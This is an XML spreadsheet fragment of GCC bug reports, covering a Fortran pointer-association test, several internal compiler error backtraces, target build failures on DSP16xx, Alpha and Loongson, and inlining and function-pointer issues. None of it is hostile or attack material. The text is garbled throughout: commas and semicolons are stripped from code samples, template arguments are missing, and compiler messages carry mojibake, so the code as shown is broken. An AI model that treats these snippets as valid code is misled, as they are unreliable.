    <t>The ASSOCIATED functions returns false for the 4th test below.  It
should return true.  there have been a ton of interps and rewording
of the associated function.  It's probably clearer to read
case (v) in the F2003 standard.
      program try_mg0028
! fails on Windows XP
! gcc version 4.4.0 20080312 (experimental) [trunk revision 133139]
      real  tda2r(23)
      call       mg0028(tda2r  1  2  3)
      end
      SUBROUTINE MG0028(TDA2Rnf1nf2nf3)
      real pointer  ::  TLA2L(::)TLA2L1(::)
      real target   ::  TDA2R(NF2NF3)
      logical LL(4)
      TLA2L =&gt; TDA2R(NF2:NF1:-NF2NF3:NF1:-NF2)
      TLA2L1 =&gt; TLA2L
      LL(1) = ASSOCIATED(TLA2L)
      LL(2) = ASSOCIATED(TLA2LTLA2L1)
      LL(3) = ASSOCIATED(TLA2LTDA2R)
      LL(4) = ASSOCIATED(TLA2L1TDA2R(2:23:1:-2))  !should be true
      if (any(LL .neqv. (/ .true. .true. .false. .true./))) then
        print * LL
        print * shape(TLA2L1)
        print * shape(TDA2R(2:23:1:-2))
      endif
      END SUBROUTINE
C:\g_experiments\gfortran&gt;gfortran m
g0028.f
C:\g_experiments\gfortran&gt;a
 T T F F
           1           2
           1           2</t>
  </si>
  <si>
    <t>GCC-13614</t>
  </si>
  <si>
    <t>zero size base class not zero size in complex inheritance</t>
  </si>
  <si>
    <t>A zero size base class becomes one byte long in
a complex inheritance hierarchy.  Test case
illustrates this.  Compiles correctly with AIX V5
and Sun V7 compilers.</t>
  </si>
  <si>
    <t>starlight</t>
  </si>
  <si>
    <t>GCC-61058</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] ICE: RTL check: expected elt 3 type 'B' have '0' (rtx barrier) in distance_agu_use_in_bb at config/i386/i386.c:16740 with __builtin_unreachable()</t>
  </si>
  <si>
    <t>Created attachment 32731
reduced testcase
Compiler output:
$ gcc -fno-asynchronous-unwind-tables -mtune=atom testcase.c 
testcase.c: In function 'f':
testcase.c:4:1: internal compiler error: RTL check: expected elt 3 type 'B' have '0' (rtx barrier) in distance_agu_use_in_bb at config/i386/i386.c:17922
 }
 ^
0xac42d4 rtl_check_failed_type1(rtx_def const* int int char const* int char const*)
        /mnt/svn/gcc-trunk/gcc/rtl.c:754
0xdcc92a distance_agu_use_in_bb
        /mnt/svn/gcc-trunk/gcc/config/i386/i386.c:17922
0xdd02e9 distance_agu_use
        /mnt/svn/gcc-trunk/gcc/config/i386/i386.c:17979
0xdd02e9 ix86_lea_outperforms
        /mnt/svn/gcc-trunk/gcc/config/i386/i386.c:18063
0xffa274 output_89
        /mnt/svn/gcc-trunk/gcc/config/i386/i386.md:2081
0x872491 final_scan_insn(rtx_def* _IO_FILE* int int int*)
        /mnt/svn/gcc-trunk/gcc/final.c:2919
0x873e3d final(rtx_def* _IO_FILE* int)
        /mnt/svn/gcc-trunk/gcc/final.c:2024
0x87434e rest_of_handle_final
        /mnt/svn/gcc-trunk/gcc/final.c:4428
0x87434e execute
        /mnt/svn/gcc-trunk/gcc/final.c:4502
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ gcc -v                                                     
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-210047-lto-fortran-checking-yes-rtl-df/libexec/gcc/x86_64-unknown-linux-gnu/4.10.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=yesrtldf --enable-languages=cc++ltofortran --prefix=/mnt/svn/gcc-trunk/binary-210047-lto-fortran-checking-yes-rtl-df/ --without-cloog --without-ppl
Thread model: posix
gcc version 4.10.0 20140504 (experimental) (GCC) 
Built with RTL checking enabled.
Tested revisions:
r210047 - ICE
4.9 r209651 - ICE
4.8 r209342 - ICE
4.7 r209345 - ICE
4.6 r197894 - OK</t>
  </si>
  <si>
    <t>GCC-2192</t>
  </si>
  <si>
    <t>compilation of GToolkit gtoolkit-0.9.4] under Red HAT 7.0</t>
  </si>
  <si>
    <t>GToolKit]$ make
/bin/sh ../libtool  --mode compile gcc -c -g -O2 -DDEBUG -Wall -mcpu=pentium -pthread -DHAVE_CONFIG_H -I.. -I/usr/include/gnome-xml -I/usr/lib/glib/include -I/usr/X11R6/include -D_REENTRANT     GToolKit.m
rm -f .libs/GToolKit.lo
gcc -c -g -O2 -DDEBUG -Wall -mcpu=pentium -pthread -DHAVE_CONFIG_H -I.. -I/usr/include/gnome-xml -I/usr/lib/glib/include -I/usr/X11R6/include -D_REENTRANT GToolKit.m  -fPIC -DPIC -o .libs/GToolKit.lo
GToolKit.m:1653: Internal error: Segmentation fault.
Please submit a full bug report.
See  for instructions.
make: *** [GToolKit.o] Erreur 1
Release:
gcc version 2.96 20000731and
Environment:
gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.0)
How-To-Repeat:
PLease Help
I already submitted  this bug and did not get any answer</t>
  </si>
  <si>
    <t>bmrevet</t>
  </si>
  <si>
    <t>GCC-59643</t>
  </si>
  <si>
    <t>Predictive commoning unnecessarily punts on scimark2 SOR</t>
  </si>
  <si>
    <t>I've noticed GCC performs badly on scimark2 SOR compared to llvm 3.[34] and I believe the difference is in predictive commoning which IMHO unnecessarily
gives up on the loop.
https://cmssdt.cern.ch/SDT/lxr/source/Validation/Performance/bin/SOR.c?v=Sat
The inner loop is:
               for (j=1 j&lt;Nm1 j++)
                     Gi[j] = omega_over_four * (Gim1[j] + Gip1[j] + Gi[j-1] 
                                 + Gi[j+1]) + one_minus_omega * Gi[j]
and the problem is that data ref doesn't know that Gim1[j] and Gip1[j] reads don't conflict with the Gi[j] write (they don't in the benchmark but the compiler can't know that (unless -flto and some extra smart IPA analysis hints that that is primarily a bad choice of data structures in the benchmark instead of using array of pointers to double where each inner array is malloced separately using two dimensional array might make it clear to the compiler there is no aliasing).
When constructing components pcom ignores read-read dependencies with offset that can't be determined but in this case there is a write and thus all the data references are put into the same component and that component is unsuitable because the offset can't be determined.
For two writes with unknown dependencies there is nothing that can be done but I wonder if for the case of (suitable) write and some other read where we can't determine offset we really have to give up on both the data refs rather than just the read.  On this testcase giving up on the Gim1[j] and Gip1[j] reads that could possibly overlap with Gi[j] write is IMHO fine we just keep them as is and don't attempt to optimize them and pcom doesn't optimize away writes either (or does it?  then we'd need to say on the component that it shouldn't do it in that case).
With the untested patch I'll attach scimark2 improved from
SOR             Mflops:  1135.50    (1000 x 1000)
to
SOR             Mflops:  1617.87    (1000 x 1000)</t>
  </si>
  <si>
    <t>GCC-79414</t>
  </si>
  <si>
    <t>[7 Regression] internal compiler error after error: expected unqualified-id at end of input</t>
  </si>
  <si>
    <t>GCC 7.0.1 (git commit 7458afd6b35c4851d146f058435ba3dd6215db44) segmentation faults on following code after error: expected unqualified-id at end of input. I encountered this while applying C-Reduce to another type of crash:
class x0
template  x2() {
x0 x3 = x3.
If I try to compile this with gcc-bin/bin/g++ tst.cc command it will result in following output:
tst.cc:2:11: error: â€˜x1â€™ has not been declared
 template  x2() {
           ^~
tst.cc:2:18: error: ISO C++ forbids declaration of â€˜x2â€™ with no type [-fpermissive]
 template  x2() {
                  ^
tst.cc: In function â€˜int x2()â€™:
tst.cc:3:4: warning: â€˜x3â€™ has incomplete type
 x0 x3 = x3.
    ^~
tst.cc:1:7: note: forward declaration of â€˜class x0â€™
 class x0
       ^~
tst.cc:3:11: error: expected unqualified-id at end of input
 x0 x3 = x3.
           ^
tst.cc:3:11: internal compiler error: Segmentation fault
0xd27c4f crash_signal
        ../../gcc/gcc/toplev.c:333
0x60a355 cp_finish_decl(tree_node* tree_node* bool tree_node* int)
        ../../gcc/gcc/cp/decl.c:6877
0x708c2c cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:19398
0x70947c cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:12792
0x70a235 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:12617
0x70ace9 cp_parser_declaration_statement
        ../../gcc/gcc/cp/parser.c:12227
0x6e59c3 cp_parser_statement
        ../../gcc/gcc/cp/parser.c:10714
0x6e6a5d cp_parser_statement_seq_opt
        ../../gcc/gcc/cp/parser.c:11046
0x6e6b2f cp_parser_compound_statement
        ../../gcc/gcc/cp/parser.c:11000
0x6fad43 cp_parser_function_body
        ../../gcc/gcc/cp/parser.c:21450
0x6fad43 cp_parser_ctor_initializer_opt_and_function_body
        ../../gcc/gcc/cp/parser.c:21488
0x7037a1 cp_parser_function_definition_after_declarator
        ../../gcc/gcc/cp/parser.c:26255
0x708fa0 cp_parser_function_definition_from_specifiers_and_declarator
        ../../gcc/gcc/cp/parser.c:26167
0x708fa0 cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:19177
0x6e2a0a cp_parser_single_declaration
        ../../gcc/gcc/cp/parser.c:26713
0x702ddc cp_parser_template_declaration_after_parameters
        ../../gcc/gcc/cp/parser.c:26317
0x702a6c cp_parser_explicit_template_declaration
        ../../gcc/gcc/cp/parser.c:26552
0x702a6c cp_parser_template_declaration_after_export
        ../../gcc/gcc/cp/parser.c:26571
0x6e2ed9 cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:12464
0x71369b cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:12391
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
gcc -v gives following output on x86_64 Ubuntu 14.04 based system:
Using built-in specs.
COLLECT_GCC=/home/ejusjud/local/gcc-bin/bin/g++
COLLECT_LTO_WRAPPER=/local/ejusjud/gcc-bin/bin/../libexec/gcc/x86_64-pc-linux-gnu/7.0.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc/configure --enable-languages=cc++ --enable-libmpx --prefix=/home/ejusjud/local/gcc-bin : (reconfigured) ../gcc/configure --enable-languages=cc++ --enable-libmpx --prefix=/home/ejusjud/local/gcc-bin : (reconfigured) ../gcc/configure --enable-languages=cc++ --enable-libmpx --prefix=/home/ejusjud/local/gcc-bin : (reconfigured) ../gcc/configure --enable-languages=cc++ --enable-libmpx --prefix=/home/ejusjud/local/gcc-bin : (reconfigured) ../gcc/configure --enable-languages=cc++ --enable-libmpx --prefix=/home/ejusjud/local/gcc-bin : (reconfigured) ../gcc/configure --enable-languages=cc++ --enable-libmpx --prefix=/home/ejusjud/local/gcc-bin : (reconfigured) ../gcc/configure --enable-languages=cc++ --enable-libmpx --prefix=/home/ejusjud/local/gcc-bin : (reconfigured) ../gcc/configure --enable-languages=cc++ --enable-libmpx --prefix=/home/ejusjud/local/gcc-bin
Thread model: posix
gcc version 7.0.1 20170207 (experimental) (GCC)</t>
  </si>
  <si>
    <t>jussi.judin</t>
  </si>
  <si>
    <t>GCC-3960</t>
  </si>
  <si>
    <t>GCC-3.0 target DSP16xx doesn't compile (get syntax error)</t>
  </si>
  <si>
    <t>I'm trying to compile GCC with target DSP16xx but surprisingly I
got
some compiler errors during compilation. For example in the file
'dsp16xx.c' I got the following error messages:
...
../../combined/gcc/config/dsp16xx/dsp16xx.c: In function
`print_operand':
../../combined/gcc/config/dsp16xx/dsp16xx.c:1666: warning: implicit
declaration of function `output_operand_lossgae'
../../combined/gcc/config/dsp16xx/dsp16xx.c:1679: warning: implicit
declaration of function `fprint'
../../combined/gcc/config/dsp16xx/dsp16xx.c:1679: `f' undeclared
(first
use in this function)
../../combined/gcc/config/dsp16xx/dsp16xx.c:1679: (Each undeclared
identifier is reported only once
../../combined/gcc/config/dsp16xx/dsp16xx.c:1679: for each function
it
appears in.)
../../combined/gcc/config/dsp16xx/dsp16xx.c:1679: parse error before
`file'
../../combined/gcc/config/dsp16xx/dsp16xx.c:1678: warning: empty
body in
an if-statement
../../combined/gcc/config/dsp16xx/dsp16xx.c:1679: warning: left-hand
operand of
comma expression has no effect
../../combined/gcc/config/dsp16xx/dsp16xx.c:1679: warning: left-hand
operand of
comma expression has no effect
../../combined/gcc/config/dsp16xx/dsp16xx.c:1679: parse error before
`)'
../../combined/gcc/config/dsp16xx/dsp16xx.c: In function
`print_operand_address':
../../combined/gcc/config/dsp16xx/dsp16xx.c:1703: warning: `base'
might
be used
uninitialized in this function
../../combined/gcc/config/dsp16xx/dsp16xx.c:1704: warning: `offset'
might be used uninitialized in this function
make[1]: *** [dsp16xx.o] Error 1
make: *** [all-gcc] Error 2
In the dsp16xx.c file there are the following code lines:
...
1676:     else if (letter == 'h')
1677:       fprintf (file HOST_WIDE_INT_PRINT_DEC val)
1678:     else if (letter == 'U')
1679:       fprint(f file HOST_WIDE_INT_PRINT_HEX (val &gt;&gt; 16) &amp;
0xffff)
...
It's clear that there is a mistake in line 1679. It's worth saying
that
I'm compiling GCC 3.0 but the dsp16xx.c file downloaded from the
CVS is
exactly the same. 
I fixed this error (and I think some others) but then I got
compiler
errors because the Makefile also have some problems and I gave up.
Release:
gcc-3.0
Environment:
i586-mandrake-linux
How-To-Repeat:
Just try to build a dsp16xx target for gcc-3.0.</t>
  </si>
  <si>
    <t>ottoni</t>
  </si>
  <si>
    <t>GCC-37028</t>
  </si>
  <si>
    <t>[4.4 Regression] Error compiling alpha.c in snapshot of 20080801</t>
  </si>
  <si>
    <t>When I attempt to compile the snapshot of 20080801 on an AlphaStation 255 I get the following errors:
gcc -c  -g -fkeep-inline-functions -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wcast-qual -Wold-style-definition -Wc++-compat -Wmissing-format-attribute   -DHAVE_CONFIG_H -I. -I. -I/home/mrichmon/gcc-4.4-20080801/gcc -I/home/mrichmon/gcc-4.4-20080801/gcc/. -I/home/mrichmon/gcc-4.4-20080801/gcc/../include -I/home/mrichmon/gcc-4.4-20080801/gcc/../libcpp/include -I/home/mrichmon/mpfr-2.3.1 -I/home/mrichmon/gcc-4.4-20080801/gcc/../libdecnumber -I/home/mrichmon/gcc-4.4-20080801/gcc/../libdecnumber/dpd -I../libdecnumber  \
                /home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c -o alpha.o
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c: In function Ã¢va_list_skip_additionsÃ¢:
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:5815: warning: assignment from incompatible pointer type
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:5817: error: Ã¢PHI_NODEÃ¢ undeclared (first use in this function)
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:5817: error: (Each undeclared identifier is reported only once
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:5817: error: for each function it appears in.)
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c: In function Ã¢alpha_stdarg_optimize_hookÃ¢:
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:5862: warning: unused variable Ã¢offset_argÃ¢
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:5861: warning: unused variable Ã¢arg2Ã¢
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:5861: warning: unused variable Ã¢arg1Ã¢
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:5861: warning: unused variable Ã¢offsetÃ¢
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:5861: warning: unused variable Ã¢baseÃ¢
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c: In function Ã¢alpha_gimplify_va_arg_1Ã¢:
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:6137: error: Ã¢struct gimple_seq_dÃ¢ has no member named Ã¢commonÃ¢
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:6139: error: Ã¢struct gimple_seq_dÃ¢ has no member named Ã¢commonÃ¢
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:6139: warning: passing argument 3 of Ã¢build2_statÃ¢ from incompatible pointer type
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:6140: warning: passing argument 1 of Ã¢gimplify_assignÃ¢ from incompatible pointer type
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:6143: warning: assignment from incompatible pointer type
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:6178: warning: passing argument 3 of Ã¢gimplify_exprÃ¢ from incompatible pointer type
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:6179: warning: implicit declaration of function Ã¢append_to_statement_listÃ¢
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:6191: error: Ã¢struct gimple_seq_dÃ¢ has no member named Ã¢commonÃ¢
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:6192: error: Ã¢struct gimple_seq_dÃ¢ has no member named Ã¢commonÃ¢
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:6192: warning: passing argument 3 of Ã¢build2_statÃ¢ from incompatible pointer type
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:6193: warning: passing argument 1 of Ã¢gimplify_assignÃ¢ from incompatible pointer type
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c: In function Ã¢alpha_gimplify_va_argÃ¢:
/home/mrichmon/gcc-4.4-20080801/gcc/config/alpha/alpha.c:6229: warning: passing argument 3 of Ã¢alpha_gimplify_va_arg_1Ã¢ from incompatible pointer type</t>
  </si>
  <si>
    <t>GCC-54248</t>
  </si>
  <si>
    <t>Comment in standard library header talks about boost</t>
  </si>
  <si>
    <t>This is rather trivial thing but bits/concept_check.h contains the following comment near the bottom:
// Note that the obvious and elegant approach of
//
//#define glibcxx_function_requires(C) boost::function_requires()
//
// won't work due to concept templates with more than one parameter e.g.
// BinaryPredicateConcept.  The preprocessor tries to split things up on
// the commas in the template argument list.  We can't use an inner pair of
// parenthesis to hide the commas because boost::(Temp) isn't
// a valid instantiation pattern.  Thus we steal a feature from C99.
Should this comment really be talking about boost?</t>
  </si>
  <si>
    <t>GCC-15366</t>
  </si>
  <si>
    <t>[3.4 only][unit-at-a-time] -fno-inline-functions is ignored for static functions</t>
  </si>
  <si>
    <t>The -fno-inline-functions option is ignored by the tree inliner in gcc-3.4 for
static functions even at -O2 where according to the manual it shouldn't be
enabled in the first place. For example:
static int local (int a)
{
  return a
}
int global (int a)
{
  return a
}
int test (int a int b)
{
  return local (a) * global (b)
}
Compile with -O2 or -O3 -fno-inline-functions and see that local() is
inlined into test() but global() is not. This may be intentional but it is
confusing since the manual suggests it should be otherwise in which case this
is a documentation bug.</t>
  </si>
  <si>
    <t>GCC-10807</t>
  </si>
  <si>
    <t>[DR 295] It should be possible to cv-qualify function types if the CV qualifications are introduced through a typedef or a template argument</t>
  </si>
  <si>
    <t>The following code is legal as per approval of DR 295:
-------------------------------------------------
// CV qualifications through typedefs are ok (and ignored)
typedef void func_type(int)
typedef const volatile func_type cv_func_type
void func(int) {}
cv_func_type* func_ptr = func
// CV qualifications through template arguments are ok (and ignored)
template 
void bar(const volatile T&amp; p)
{
    typedef const volatile T cvT
    cvT* func = p
    func(10)
}
int main()
{
    bar(func)
}
-------------------------------------------------
dr295.cpp:3: error: `const volatile' qualifiers cannot be applied to `void ()(int)'
dr295.cpp: In function `int main()':
dr295.cpp:21: error: no matching function for call to `bar(void (&amp;)(int))'
Please notice that c++/3518 is surely related to this PR.
So once this is implemented c++/3518 should be checked
again.
Release:
3.4
Environment:
i686-pc-cygwin
How-To-Repeat:
Compile the above snippet</t>
  </si>
  <si>
    <t>GCC-9909</t>
  </si>
  <si>
    <t>internal compile error</t>
  </si>
  <si>
    <t>char *trim(char *st)
{
	int len
	static pthread_mutex_t lock=0
	pthread_mutex_lock(lock)
	for (len=strlen(st)
	     len&gt;0 
	     len--)
		st[len-1]='\000'
	return (st)
}
Release:
2.95.3 20010315
Environment:
Slackware linux 2.4.18 i686
How-To-Repeat:
gcc -v -save-temps -I. -I../inc -I../../ttf/inc -o mlib.o mlib.cpp</t>
  </si>
  <si>
    <t>maacs</t>
  </si>
  <si>
    <t>GCC-30176</t>
  </si>
  <si>
    <t>gcc.dg/tree-prof/stringop-1.c fails</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/tree-prof/stringop-1.c scan-tree-dump memcpy.*4\\)
looks like a wrong regexp?</t>
  </si>
  <si>
    <t>GCC-17564</t>
  </si>
  <si>
    <t>[4.0 Regression] New treatment of function pointers when used with equality operators when casts are involved</t>
  </si>
  <si>
    <t>As a GCC extension GCC allows the comparison of a function pointer and
a void pointer.  Previous versions of GCC didn't canonicalize the function
pointer when it was compared with a void pointer.  Unfortunately there
doesn't appear to be any documentation on when canonicalization is
performed.
Now GCC canonicalizes the function pointer when compared with a void
pointer.  It even does so when the function pointer is cast to a void
pointer.  The following program demonstrates the problem:
void *f (void) __attribute__ ((__noinline__))
void *
f (void)
{
  return f
}
int
main (void)
{
  if (f () != f)
    abort ()
  exit (0)
}
000105b4 :
   105b4:       6b c2 3f d9     stw rp-14(sp)
   105b8:       e8 5f 1f d5     bl 105a8 rp
   105bc:       6f c4 01 00     stwma r480(sp)
   105c0:       08 1c 02 44     copy ret0r4
   105c4:       23 88 10 00     ldil 10800ret0
   105c8:       e8 40 00 60     bl 10600 r
p
   105cc:       4b 9a 02 b0     ldw 158(ret0)r26
   105d0:       80 9c 20 0a     cmpb=n ret0r4105dc 
   105d4:       e8 5f 1d 5d     bl 10488 rp
The address of the function descriptor for f is passed to
__canonicalize_funcptr_for_compare for canonicalization whereas the pointer
passed back from f as a void pointer is not canonicalized.  The causes
the program to abort with the current 4.0 CVS source.
The change in function pointer canonicalization causes the testcase
for PR17377 to fail.</t>
  </si>
  <si>
    <t>GCC-45941</t>
  </si>
  <si>
    <t>Failed compile on Loongson2f</t>
  </si>
  <si>
    <t>Hi
   I am doing a LFS on Loongson2f successed in gcc-4.5.1 pass1 but failed in
pass 2 here is the configure line:
../gcc-4.5.1/configure  --prefix=/tools --disable-multilib  --libexecdir=/tools/lib --with-local-prefix=/tools  --enable-long-long --enable-c99 --enable-shared  --enable-threads=posix --disable-nls  --enable-__cxa_atexit --enable-languages=c  --disable-libstdcxx-pch --disable-bootstrap  --with-abi=${MABI} --with-gmp-include=$(pwd)/gmp --with-gmp-lib=$(pwd)/gmp/.libs
   then the result of running make:
   my64@debian:/64_system/build/gcc-build$ make
make[1]: Entering directory `/64_system/build/gcc-build'
make[2]: Entering directory `/64_system/build/gcc-build/libiberty'
make[3]: Entering directory `/64_system/build/gcc-build/libiberty/testsuite'
make[3]: Nothing to be done for `all'.
make[3]: Leaving directory `/64_system/build/gcc-build/libiberty/testsuite'
make[2]: Leaving directory `/64_system/build/gcc-build/libiberty'
make[2]: Entering directory `/64_system/build/gcc-build/fixincludes'
make[2]: Nothing to be done for `all'.
make[2]: Leaving directory `/64_system/build/gcc-build/fixincludes'
make[2]: Entering directory `/64_system/build/gcc-build/gmp'
make  all-recursive
make[3]: Entering directory `/64_system/build/gcc-build/gmp'
Making all in tests
make[4]: Entering directory `/64_system/build/gcc-build/gmp/tests'
Making all in .
make[5]: Entering directory `/64_system/build/gcc-build/gmp/tests'
make[5]: Nothing to be done for `all-am'.
make[5]: Leaving directory `/64_system/build/gcc-build/gmp/tests'
Making all in devel
make[5]: Entering directory `/64_system/build/gcc-build/gmp/tests/devel'
make[5]: Nothing to be done for `all'.
make[5]: Leaving directory `/64_system/build/gcc-build/gmp/tests/devel'
Making all in mpn
make[5]: Entering directory `/64_system/build/gcc-build/gmp/tests/mpn'
make[5]: Nothing to be done for `all'.
make[5]: Leaving directory `/64_system/build/gcc-build/gmp/tests/mpn'
Making all in mpz
make[5]: Entering directory `/64_system/build/gcc-build/gmp/tests/mpz'
make[5]: Nothing to be done for `all'.
make[5]: Leaving directory `/64_system/build/gcc-build/gmp/tests/mpz'
Making all in mpq
make[5]: Entering directory `/64_system/build/gcc-build/gmp/tests/mpq'
make[5]: Nothing to be done for `all'.
make[5]: Leaving directory `/64_system/build/gcc-build/gmp/tests/mpq'
Making all in mpf
make[5]: Entering directory `/64_system/build/gcc-build/gmp/tests/mpf'
make[5]: Nothing to be done for `all'.
make[5]: Leaving directory `/64_system/build/gcc-build/gmp/tests/mpf'
Making all in rand
make[5]: Entering directory `/64_system/build/gcc-build/gmp/tests/rand'
make[5]: Nothing to be done for `all'.
make[5]: Leaving directory `/64_system/build/gcc-build/gmp/tests/rand'
Making all in misc
make[5]: Entering directory `/64_system/build/gcc-build/gmp/tests/misc'
make[5]: Nothing to be done for `all'.
make[5]: Leaving directory `/64_system/build/gcc-build/gmp/tests/misc'
Making all in cxx
make[5]: Entering directory `/64_system/build/gcc-build/gmp/tests/cxx'
make[5]: Nothing to be done for `all'.
make[5]: Leaving directory `/64_system/build/gcc-build/gmp/tests/cxx'
Making all in mpbsd
make[5]: Entering directory `/64_system/build/gcc-build/gmp/tests/mpbsd'
make[5]: Nothing to be done for `all'.
make[5]: Leaving directory `/64_system/build/gcc-build/gmp/tests/mpbsd'
make[4]: Leaving directory `/64_system/build/gcc-build/gmp/tests'
Making all in mpn
make[4]: Entering directory `/64_system/build/gcc-build/gmp/mpn'
make[4]: Nothing to be done for `all'.
make[4]: Leaving directory `/64_system/build/gcc-build/gmp/mpn'
Making all in mpz
make[4]: Entering directory `/64_system/build/gcc-build/gmp/mpz'
make[4]: Nothing to be done for `all'.
make[4]: Leaving directory `/64_system/build/gcc-build/gmp/mpz'
Making all in mpq
make[4]: Entering directory `/64_system/build/gcc-build/gmp/mpq'
make[4]: Nothing to be done for `all'.
make[4]: Leaving directory `/64_system/build/gcc-build/gmp/mpq'
Making all in mpf
make[4]: Entering directory `/64_system/build/gcc-build/gmp/mpf'
make[4]: Nothing to be done for `all'.
make[4]: Leaving directory `/64_system/build/gcc-build/gmp/mpf'
Making all in printf
make[4]: Entering directory `/64_system/build/gcc-build/gmp/printf'
make[4]: Nothing to be done for `all'.
make[4]: Leaving directory `/64_system/build/gcc-build/gmp/printf'
Making all in scanf
make[4]: Entering directory `/64_system/build/gcc-build/gmp/scanf'
make[4]: Nothing to be done for `all'.
make[4]: Leaving directory `/64_system/build/gcc-build/gmp/scanf'
Making all in cxx
make[4]: Entering directory `/64_system/build/gcc-build/gmp/cxx'
make[4]: Nothing to be done for `all'.
make[4]: Leaving directory `/64_system/build/gcc-build/gmp/cxx'
Making all in mpbsd
make[4]: Entering directory `/64_system/build/gcc-build/gmp/mpbsd'
make[4]: Nothing to be done for `all'.
make[4]: Leaving directory `/64_system/build/gcc-build/gmp/mpbsd'
Making all in demos
make[4]: Entering directory `/64_system/build/gcc-build/gmp/demos'
Making all in calc
make[5]: Entering directory `/64_system/build/gcc-build/gmp/demos/calc'
make  all-am
make[6]: Entering directory `/64_system/build/gcc-build/gmp/demos/calc'
make[6]: Nothing to be done for `all-am'.
make[6]: Leaving directory `/64_system/build/gcc-build/gmp/demos/calc'
make[5]: Leaving directory `/64_system/build/gcc-build/gmp/demos/calc'
Making all in expr
make[5]: Entering directory `/64_system/build/gcc-build/gmp/demos/expr'
make[5]: Nothing to be done for `all'.
make[5]: Leaving directory `/64_system/build/gcc-build/gmp/demos/expr'
make[5]: Entering directory `/64_system/build/gcc-build/gmp/demos'
make[5]: Nothing to be done for `all-am'.
make[5]: Leaving directory `/64_system/build/gcc-build/gmp/demos'
make[4]: Leaving directory `/64_system/build/gcc-build/gmp/demos'
Making all in tune
make[4]: Entering directory `/64_system/build/gcc-build/gmp/tune'
make[4]: Nothing to be done for `all'.
make[4]: Leaving directory `/64_system/build/gcc-build/gmp/tune'
Making all in doc
make[4]: Entering directory `/64_system/build/gcc-build/gmp/doc'
make[4]: Nothing to be done for `all'.
make[4]: Leaving directory `/64_system/build/gcc-build/gmp/doc'
make[4]: Entering directory `/64_system/build/gcc-build/gmp'
make[4]: Leaving directory `/64_system/build/gcc-build/gmp'
make[3]: Leaving directory `/64_system/build/gcc-build/gmp'
make[2]: Leaving directory `/64_system/build/gcc-build/gmp'
make[2]: Entering directory `/64_system/build/gcc-build/intl'
make[2]: Nothing to be done for `all'.
make[2]: Leaving directory `/64_system/build/gcc-build/intl'
make[2]: Entering directory `/64_system/build/gcc-build/mpfr'
Making all in tests
make[3]: Entering directory `/64_system/build/gcc-build/mpfr/tests'
make[3]: Nothing to be done for `all'.
make[3]: Leaving directory `/64_system/build/gcc-build/mpfr/tests'
make[3]: Entering directory `/64_system/build/gcc-build/mpfr'
make[3]: Nothing to be done for `all-am'.
make[3]: Leaving directory `/64_system/build/gcc-build/mpfr'
make[2]: Leaving directory `/64_system/build/gcc-build/mpfr'
make[2]: Entering directory `/64_system/build/gcc-build/mpc'
make  all-recursive
make[3]: Entering directory `/64_system/build/gcc-build/mpc'
Making all in src
make[4]: Entering directory `/64_system/build/gcc-build/mpc/src'
make[4]: Nothing to be done for `all'.
make[4]: Leaving directory `/64_system/build/gcc-build/mpc/src'
Making all in tests
make[4]: Entering directory `/64_system/build/gcc-build/mpc/tests'
make[4]: Nothing to be done for `all'.
make[4]: Leaving directory `/64_system/build/gcc-build/mpc/tests'
Making all in doc
make[4]: Entering directory `/64_system/build/gcc-build/mpc/doc'
make[4]: Nothing to be done for `all'.
make[4]: Leaving directory `/64_system/build/gcc-build/mpc/doc'
make[4]: Entering directory `/64_system/build/gcc-build/mpc'
make[4]: Leaving directory `/64_system/build/gcc-build/mpc'
make[3]: Leaving directory `/64_system/build/gcc-build/mpc'
make[2]: Leaving directory `/64_system/build/gcc-build/mpc'
